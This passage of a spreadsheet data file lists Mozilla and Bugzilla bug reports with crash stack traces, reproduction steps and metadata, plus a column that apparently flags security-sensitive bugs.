 	xul.dll!mozilla::NrIceMediaStream::SendPacket(int component_id, const unsigned char * data, unsigned int len) Line 568	C++
 	xul.dll!mozilla::TransportLayerIce::SendPacket(const unsigned char * data, unsigned int len) Line 172	C++
 	xul.dll!mozilla::TransportLayerNSPRAdapter::Write(const void * buf, int length) Line 114	C++
 	xul.dll!mozilla::TransportLayerWrite(PRFileDesc * f, const void * buf, int length) Line 142	C++
 	xul.dll!mozilla::TransportLayerSend(PRFileDesc * f, const void * buf, int amount, int flags, unsigned int to) Line 234	C++
 	nss3.dll!ssl_DefSend(sslSocketStr * ss, const unsigned char * buf, int len, int flags) Line 103	C
 	nss3.dll!ssl3_SendRecord(sslSocketStr * ss, ssl3CipherSpec * cwSpec, SSL3ContentType type, const unsigned char * pIn, int nIn, int flags) Line 3234	C
 	nss3.dll!SSL3_SendAlert(sslSocketStr * ss, SSL3AlertLevel level, SSL3AlertDescription desc) Line 3528	C
 	nss3.dll!ssl_SecureClose(sslSocketStr * ss) Line 777	C
 	nss3.dll!ssl_Close(PRFileDesc * fd) Line 2507	C
 	nss3.dll!PR_Close(PRFileDesc * fd) Line 104	C
 	xul.dll!mozilla::TransportLayerDtls::~TransportLayerDtls() Line 374	C++
 	[External Code]	
 	xul.dll!mozilla::TransportFlow::ClearLayers(std::deque&lt;mozilla::TransportLayer *,std::allocator&lt;mozilla::TransportLayer *&gt; &gt; * layers) Line 58	C++
 	xul.dll!mozilla::TransportFlow::DestroyFinal(nsAutoPtr&lt;std::deque&lt;mozilla::TransportLayer *,std::allocator&lt;mozilla::TransportLayer *&gt; &gt; &gt; layers) Line 45	C++
 	xul.dll!mozilla::runnable_args_func&lt;void (__cdecl*)(nsAutoPtr&lt;std::deque&lt;mozilla::TransportLayer *,std::allocator&lt;mozilla::TransportLayer *&gt; &gt; &gt;),nsAutoPtr&lt;std::deque&lt;mozilla::TransportLayer *,std::allocator&lt;mozilla::TransportLayer *&gt; &gt; &gt; &gt;::Run() Line 118	C++
 	xul.dll!mozilla::TransportFlow::~TransportFlow() Line 39	C++
 	xul.dll!mozilla::TransportFlow::Release() Line 19	C++
 	xul.dll!nsProxyReleaseEvent&lt;mozilla::TransportFlow&gt;::Run() Line 33	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 1029	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 290	C++
 	xul.dll!mozilla::net::nsSocketTransportService::Run() Line 914	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 1029	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 290	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 354	C++
 	xul.dll!MessageLoop::RunHandler() Line 229	C++
 	xul.dll!MessageLoop::Run() Line 209	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 468	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 419	C
 	nss3.dll!pr_root(void * arg) Line 95	C
 	[External Code]	
 	[Frames below may be incorrect and/or missing, no symbols loaded for ucrtbase.dll]</t>
        </is>
      </c>
      <c r="X988" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="989">
      <c r="A989" t="n">
        <v>185107</v>
      </c>
      <c r="B989" t="inlineStr">
        <is>
          <t>2002-12-12 15:17:54 -0800</t>
        </is>
      </c>
      <c r="C989" t="inlineStr">
        <is>
          <t>[FIX]Popup menu after right-click inside an iFrame is in wrong place.</t>
        </is>
      </c>
      <c r="D989" t="inlineStr">
        <is>
          <t>2003-02-07 21:45:29 -0800</t>
        </is>
      </c>
      <c r="E989" t="n">
        <v>1</v>
      </c>
      <c r="F989" t="n">
        <v>1</v>
      </c>
      <c r="G989" t="n">
        <v>3</v>
      </c>
      <c r="H989" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I989" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J989" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K989" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L989" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M989" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N989" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P989" t="inlineStr">
        <is>
          <t>[adt3]</t>
        </is>
      </c>
      <c r="Q989" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R989" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S989" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T989" t="n">
        <v>1</v>
      </c>
      <c r="U989" t="n">
        <v>0</v>
      </c>
      <c r="V989" t="n">
        <v>41</v>
      </c>
      <c r="W989" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3a) Gecko/20021212
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3a) Gecko/20021212
Normally when I click on the Intellicast Weather link using the right button on
the mouse, the popup menu appears right next to the cursor. This works fine for
the two Weather.com links.
Since a few days ago, this has stopped working properly.
Reproducible: Always
Steps to Reproduce:
1. Right-Click on Weather.com link and see it works.
2. Right-Click on Intellicast link (far right link) and see it doesn't work.
3.
Actual Results:  
Popup menu is way off to the left of the cursor.
Expected Results:  
Popup to appear in same way as Weather.com links, and as it used to.
I will add a simplified test case ASAP.</t>
        </is>
      </c>
      <c r="X989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="990">
      <c r="A990" t="n">
        <v>841238</v>
      </c>
      <c r="B990" t="inlineStr">
        <is>
          <t>2013-02-13 17:05:27 -0800</t>
        </is>
      </c>
      <c r="C990" t="inlineStr">
        <is>
          <t>Update tabs module docs to mention private tabs in per-tab and per-window pb</t>
        </is>
      </c>
      <c r="D990" t="inlineStr">
        <is>
          <t>2013-03-19 17:24:36 -0700</t>
        </is>
      </c>
      <c r="E990" t="n">
        <v>1</v>
      </c>
      <c r="F990" t="n">
        <v>1</v>
      </c>
      <c r="G990" t="n">
        <v>6</v>
      </c>
      <c r="H990" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I990" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J990" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K990" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N990" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P990" t="inlineStr"/>
      <c r="Q990" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R990" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S990" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T990" t="n">
        <v>1</v>
      </c>
      <c r="U990" t="n">
        <v>0</v>
      </c>
      <c r="V990" t="n">
        <v>2</v>
      </c>
      <c r="W990" t="inlineStr">
        <is>
          <t>We should mention that private tabs are ignored when pb is not supported and that `require('private-browsing').isPrivate(tab)` is how you determine if a tab is private when pb is suportted.</t>
        </is>
      </c>
      <c r="X990" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="991">
      <c r="A991" t="n">
        <v>496134</v>
      </c>
      <c r="B991" t="inlineStr">
        <is>
          <t>2009-06-03 08:52:46 -0700</t>
        </is>
      </c>
      <c r="C991" t="inlineStr">
        <is>
          <t>Function in destructuring assignment can't see up to other variables in the assignment</t>
        </is>
      </c>
      <c r="D991" t="inlineStr">
        <is>
          <t>2011-03-31 06:33:26 -0700</t>
        </is>
      </c>
      <c r="E991" t="n">
        <v>1</v>
      </c>
      <c r="F991" t="n">
        <v>1</v>
      </c>
      <c r="G991" t="n">
        <v>3</v>
      </c>
      <c r="H991" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I991" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J991" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K991" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P991" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q991" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R991" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S991" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T991" t="n">
        <v>1</v>
      </c>
      <c r="U991" t="n">
        <v>0</v>
      </c>
      <c r="V991" t="n">
        <v>32</v>
      </c>
      <c r="W991" t="inlineStr">
        <is>
          <t>function test_js() {
  let [A, B] = [function() B, 123];
  print(A);
  print(B);
  print(A());
}
That gives an output of:
function () B
123
An exception occurred: ReferenceError: B is not defined
However.. I can't reproduce this outside of the jsmodules test harness.
I have export XULRUNNER_BIN=/Applications/Shiretoko.app/Contents/MacOS/firefox
And if I run that code from Shiretoko directly, A() gets 123.
Myk: Does the jsmodules test harness do anything that might cause this?
One work around is to declare the variables beforehand:
let A, B;
[A, B] = [function() B, 123];
But then I'm not sure if this is a bug or not. Each part in the destructured assignment isn't supposed to see the other definition, so let [A, B] = [1, A] definitly wouldn't work because A isn't defined, but I'm not sure what should happen with functions.</t>
        </is>
      </c>
      <c r="X991" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="992">
      <c r="A992" t="n">
        <v>494617</v>
      </c>
      <c r="B992" t="inlineStr">
        <is>
          <t>2009-05-23 13:37:01 -0700</t>
        </is>
      </c>
      <c r="C992" t="inlineStr">
        <is>
          <t>Crash [@ memmove | nsTArray_base::ShiftData | nsXULDocument::ResolveForwardReferences] with overlay, observes, event handlers removing window and xmlhttprequest</t>
        </is>
      </c>
      <c r="D992" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E992" t="n">
        <v>1</v>
      </c>
      <c r="F992" t="n">
        <v>1</v>
      </c>
      <c r="G992" t="n">
        <v>3</v>
      </c>
      <c r="H992" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I992" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J992" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K992" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N992" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P992" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q992" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R992" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S992" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T992" t="n">
        <v>1</v>
      </c>
      <c r="U992" t="n">
        <v>0</v>
      </c>
      <c r="V992" t="n">
        <v>38</v>
      </c>
      <c r="W992" t="inlineStr">
        <is>
          <t>Created attachment 379372
zipped up testase
See zipped up testcase, which crashes current trunk build and Firefox3.0.x after 1 second.
To reproduce, extract the zipped up testcase, then open up the file named 'parentframe.htm'.
http://crash-stats.mozilla.com/report/index/d45a612e-9960-4f8a-9244-833ef2090523?p=1
0  	mozcrt19.dll  	memmove  	 MEMCPY.ASM:188
1 	xul.dll 	nsTArray_base::ShiftData 	obj-firefox/xpcom/build/nsTArray.cpp:173
2 	xul.dll 	nsXULDocument::ResolveForwardReferences 	content/xul/document/src/nsXULDocument.cpp:1210
3 	xul.dll 	nsXULDocument::ResumeWalk 	content/xul/document/src/nsXULDocument.cpp:3136
4 	xul.dll 	nsXULDocument::OnPrototypeLoadDone 	content/xul/document/src/nsXULDocument.cpp:625
5 	xul.dll 	nsXULDocument::EndLoad 	content/xul/document/src/nsXULDocument.cpp:608
6 	xul.dll 	XULContentSinkImpl::DidBuildModel 	content/xul/document/src/nsXULContentSink.cpp:278
7 	xul.dll 	nsExpatDriver::DidBuildModel 	parser/htmlparser/src/nsExpatDriver.cpp:1319
8 	xul.dll 	nsParser::DidBuildModel 	parser/htmlparser/src/nsParser.cpp:1563
9 	xul.dll 	nsParser::ResumeParse 	parser/htmlparser/src/nsParser.cpp:2312
10 	nspr4.dll 	_MD_CURRENT_THREAD 	nsprpub/pr/src/md/windows/w95thred.c:308
11 	xul.dll 	nsBaseChannel::OnStopRequest 	netwerk/base/src/nsBaseChannel.cpp:680
12 	xul.dll 	nsInputStreamPump::OnStateStop 	netwerk/base/src/nsInputStreamPump.cpp:576
13 	xul.dll 	nsInputStreamPump::OnInputStreamReady 	netwerk/base/src/nsInputStreamPump.cpp:401
14 	xul.dll 	nsOutputStreamReadyEvent::Run 	xpcom/io/nsStreamUtils.cpp:190
15 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
16 	xul.dll 	NS_ProcessNextEvent_P 	obj-firefox/xpcom/build/nsThreadUtils.cpp:230
17 	xul.dll 	xul.dll@0x3dac0f 	
18 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
19 	xul.dll 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2491
Firefox3 breakpad report:
http://crash-stats.mozilla.com/report/index/b972a51b-44bf-401c-8131-026ae2090523?p=1
0  	 	@0x325dc0</t>
        </is>
      </c>
      <c r="X992" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="993">
      <c r="A993" t="n">
        <v>752087</v>
      </c>
      <c r="B993" t="inlineStr">
        <is>
          <t>2012-05-04 15:50:37 -0700</t>
        </is>
      </c>
      <c r="C993" t="inlineStr">
        <is>
          <t>Crash [@ js::GetObjectClass(JSObject const *)] | [@ nsXPConnect::GetNativeOfWrapper]</t>
        </is>
      </c>
      <c r="D993" t="inlineStr">
        <is>
          <t>2012-10-21 22:18:40 -0700</t>
        </is>
      </c>
      <c r="E993" t="n">
        <v>1</v>
      </c>
      <c r="F993" t="n">
        <v>1</v>
      </c>
      <c r="G993" t="n">
        <v>3</v>
      </c>
      <c r="H993" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I993" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J993" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K993" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N993" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P993" t="inlineStr">
        <is>
          <t>[inbound][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q993" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R993" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S993" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T993" t="n">
        <v>1</v>
      </c>
      <c r="U993" t="n">
        <v>0</v>
      </c>
      <c r="V993" t="n">
        <v>23</v>
      </c>
      <c r="W993" t="inlineStr">
        <is>
          <t>Created attachment 621204
Debug Crash Report
http://us.blizzard.com/en-us/games/music/sc2-wings-of-liberty.html
http://www.ohmstudio.com/
###!!! ASSERTION: bad param: 'aJSObj', file /work/mozilla/builds/nightly/mozilla/js/xpconnect/src/nsXPConnect.cpp, line 1429
###!!! ASSERTION: bad param: 'obj', file /work/mozilla/builds/nightly/mozilla/js/xpconnect/src/XPCWrappedNative.cpp, line 1786
Nightly Debug Crash @ js::GetObjectClass(JSObject const *)
Nightly Opt Crash @ nsXPConnect::GetNativeOfWrapper
bp-412995f0-045d-485c-92aa-daf952120504
bp-c96d3eee-924d-41d4-8a20-7e6832120504
Marking s-s since bug 729812 is s-s, but this is a crash at null. This may be a dupe of that though.</t>
        </is>
      </c>
      <c r="X993" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="994">
      <c r="A994" t="n">
        <v>105366</v>
      </c>
      <c r="B994" t="inlineStr">
        <is>
          <t>2001-10-17 20:59:16 -0700</t>
        </is>
      </c>
      <c r="C994" t="inlineStr">
        <is>
          <t>Provide suexec documentation</t>
        </is>
      </c>
      <c r="D994" t="inlineStr">
        <is>
          <t>2007-10-16 03:04:08 -0700</t>
        </is>
      </c>
      <c r="E994" t="n">
        <v>1</v>
      </c>
      <c r="F994" t="n">
        <v>1</v>
      </c>
      <c r="G994" t="n">
        <v>4</v>
      </c>
      <c r="H994" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I994" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J994" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K994" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L994" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N994" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P994" t="inlineStr"/>
      <c r="Q994" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R994" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S994" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T994" t="n">
        <v>1</v>
      </c>
      <c r="U994" t="n">
        <v>0</v>
      </c>
      <c r="V994" t="n">
        <v>40</v>
      </c>
      <c r="W994" t="inlineStr">
        <is>
          <t>If you are using Bugzilla with Apache's suexec feature, checksetup.pl will break
bugzilla by resetting ownership of files to root (if checksetup.pl is run as
root). This can be rectified by adding a webserveruser parameter to localconfig.</t>
        </is>
      </c>
      <c r="X994" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="995">
      <c r="A995" t="n">
        <v>478147</v>
      </c>
      <c r="B995" t="inlineStr">
        <is>
          <t>2009-02-11 19:42:02 -0800</t>
        </is>
      </c>
      <c r="C995" t="inlineStr">
        <is>
          <t>Focus rect missing from checkboxes on Vista</t>
        </is>
      </c>
      <c r="D995" t="inlineStr">
        <is>
          <t>2016-01-10 17:02:37 -0800</t>
        </is>
      </c>
      <c r="E995" t="n">
        <v>1</v>
      </c>
      <c r="F995" t="n">
        <v>1</v>
      </c>
      <c r="G995" t="n">
        <v>3</v>
      </c>
      <c r="H995" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I995" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J995" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K995" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L995" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M995" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N995" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P995" t="inlineStr"/>
      <c r="Q995" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R995" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S995" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T995" t="n">
        <v>1</v>
      </c>
      <c r="U995" t="n">
        <v>0</v>
      </c>
      <c r="V995" t="n">
        <v>23</v>
      </c>
      <c r="W995" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2a1pre) Gecko/20090211 Minefield/3.2a1pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2a1pre) Gecko/20090211 Minefield/3.2a1pre
When giving focus to a checkbox on Vista there is no border change when using the Aero windows theme. Using the classic theme the focus border is only present on the bottom and right sides of the checkbox.
Reproducible: Always
Steps to Reproduce:
1. Give a checkbox focus
Actual Results:  
Checkbox shows no indication that it has focus.
Expected Results:  
Checkbox should show indication that it has focus.</t>
        </is>
      </c>
      <c r="X995" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="996">
      <c r="A996" t="n">
        <v>1310162</v>
      </c>
      <c r="B996" t="inlineStr">
        <is>
          <t>2016-10-14 04:51:14 -0700</t>
        </is>
      </c>
      <c r="C996" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::CompareSimpleTextTrackEvents::TrackChildPosition</t>
        </is>
      </c>
      <c r="D996" t="inlineStr">
        <is>
          <t>2017-01-05 01:15:46 -0800</t>
        </is>
      </c>
      <c r="E996" t="n">
        <v>1</v>
      </c>
      <c r="F996" t="n">
        <v>1</v>
      </c>
      <c r="G996" t="n">
        <v>3</v>
      </c>
      <c r="H996" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I996" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J996" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K996" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L996" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M996" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N996" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P996" t="inlineStr"/>
      <c r="Q996" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R996" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S996" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T996" t="n">
        <v>1</v>
      </c>
      <c r="U996" t="n">
        <v>0</v>
      </c>
      <c r="V996" t="n">
        <v>17</v>
      </c>
      <c r="W996" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-af5e0205-eb21-4f33-a2b5-bfd4b2161014.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::dom::CompareSimpleTextTrackEvents::TrackChildPosition(mozilla::dom::SimpleTextTrackEvent*) 	dom/html/TextTrackManager.cpp:467
1 	xul.dll 	mozilla::dom::CompareSimpleTextTrackEvents::LessThan(mozilla::dom::SimpleTextTrackEvent*, mozilla::dom::SimpleTextTrackEvent*) 	dom/html/TextTrackManager.cpp:494
2 	xul.dll 	mozilla::BinarySearchIf&lt;nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;, nsTArrayInfallibleAllocator&gt;, detail::ItemComparatorFirstElementGT&lt;mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents&gt; &gt;(nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;, nsTArrayInfallibleAllocator&gt; const&amp;, unsigned int, unsigned int, detail::ItemComparatorFirstElementGT&lt;mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents&gt; const&amp;, unsigned int*) 	obj-firefox/dist/include/mozilla/BinarySearch.h:80
3 	xul.dll 	nsTArray_Impl&lt;RefPtr&lt;mozilla::dom::SimpleTextTrackEvent&gt;, nsTArrayInfallibleAllocator&gt;::InsertElementSorted&lt;mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents, nsTArrayInfallibleAllocator&gt;(mozilla::dom::SimpleTextTrackEvent*&amp;, mozilla::dom::CompareSimpleTextTrackEvents const&amp;) 	obj-firefox/dist/include/nsTArray.h:1444
4 	xul.dll 	mozilla::dom::HTMLMediaElement::FireTimeUpdate(bool) 	dom/html/HTMLMediaElement.cpp:5178
this is a new crash signature that started to pop up in firefox 50 pre-release builds and subsequent versions and is happening in the codepath added with bug 882718.
so far it's happening on various versions of windows with a rather low volume (0.07% of browser crashes in 50.0b6).</t>
        </is>
      </c>
      <c r="X996" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="997">
      <c r="A997" t="n">
        <v>1064140</v>
      </c>
      <c r="B997" t="inlineStr">
        <is>
          <t>2014-09-07 21:28:55 -0700</t>
        </is>
      </c>
      <c r="C997" t="inlineStr">
        <is>
          <t>[SECURITY] Private comments can be shown to flagmail recipients who aren't in the insider group</t>
        </is>
      </c>
      <c r="D997" t="inlineStr">
        <is>
          <t>2014-10-14 23:50:16 -0700</t>
        </is>
      </c>
      <c r="E997" t="n">
        <v>1</v>
      </c>
      <c r="F997" t="n">
        <v>1</v>
      </c>
      <c r="G997" t="n">
        <v>4</v>
      </c>
      <c r="H997" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I997" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J997" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K997" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N997" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P997" t="inlineStr"/>
      <c r="Q997" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R997" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S997" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T997" t="n">
        <v>1</v>
      </c>
      <c r="U997" t="n">
        <v>0</v>
      </c>
      <c r="V997" t="n">
        <v>15</v>
      </c>
      <c r="W997" t="inlineStr">
        <is>
          <t>template/en/default/email/flagmail.txt.tmpl has:
&gt; [% IF Bugzilla.cgi.param("comment").defined &amp;&amp; Bugzilla.cgi.param("comment").length &gt; 0 %]
&gt; ------- Additional Comments from [% user.identity %]
&gt; [%+ Bugzilla.cgi.param("comment") FILTER strip_control_chars %]
it's highly likely this will not work for API driven updates.</t>
        </is>
      </c>
      <c r="X997" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="998">
      <c r="A998" t="n">
        <v>1144181</v>
      </c>
      <c r="B998" t="inlineStr">
        <is>
          <t>2015-03-17 09:14:51 -0700</t>
        </is>
      </c>
      <c r="C998" t="inlineStr">
        <is>
          <t>Configure MigrationCrashStorage for switching from us-west to us-east S3 for AWS migration</t>
        </is>
      </c>
      <c r="D998" t="inlineStr">
        <is>
          <t>2017-08-08 16:28:27 -0700</t>
        </is>
      </c>
      <c r="E998" t="n">
        <v>1</v>
      </c>
      <c r="F998" t="n">
        <v>1</v>
      </c>
      <c r="G998" t="n">
        <v>4</v>
      </c>
      <c r="H998" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I998" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J998" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K998" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L998" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M998" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N998" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O998" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P998" t="inlineStr"/>
      <c r="Q998" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R998" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S998" t="inlineStr">
        <is>
          <t>---</t>
